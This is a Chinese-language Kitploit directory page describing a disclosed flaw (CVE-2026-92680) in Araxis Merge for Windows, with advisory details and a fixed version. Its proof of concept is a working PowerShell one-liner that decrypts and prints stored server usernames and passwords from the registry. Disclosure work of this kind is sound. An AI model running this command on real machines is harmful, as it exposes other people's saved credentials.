Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-92680 — 解密 Araxis Merge 受 DPAPI 保护的服务器凭据的概念验证(CVE-2026-92680),展示了 Windows 上凭据存储保护不足的问题。 | Kitploit
工具/GitHubGitHub/grepstrength/cve-2026-92680
密码破解漏洞分析漏洞利用密码学
GitHubgrepstrength/cve-2026-92680

CVE-2026-92680

解密 Araxis Merge 受 DPAPI 保护的服务器凭据的概念验证(CVE-2026-92680),展示了 Windows 上凭据存储保护不足的问题。

查看仓库
1122小时18分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-92680

Araxis Merge for Windows 使用 DPAPI 存储服务器凭据,并将 pOptionalEntropy 设置为 NULL。这使得在同一用户上下文中运行的任何代码都可以解密这些凭据。

完整报告:https://grepstrength.com/research/araxis-merge

CVECVE-2026-92680
CWECWE-522: Insufficiently Protected Credentials
CVSS v3.15.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
厂商Araxis Ltd.
受影响版本Araxis Merge for Windows 2011.4074 至 2026.0
修复版本2026.1
厂商公告Merge-SA-26-00
报告日期2026-08-18
披露日期2026-XX-XX
报告者grepStrength

概念验证

这将解密并解析 HKCU\Software\Araxis\Merge\7.1\Passwords。必须以最初存储凭据的同一 Windows 用户身份运行。

root@kitploit:~
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize

备注

所有测试均在 grepStength Security 拥有的系统上使用合成凭据进行。此问题已报告给 Araxis Ltd.,并在修复程序发布后公开披露。

许可证

MIT

下载工具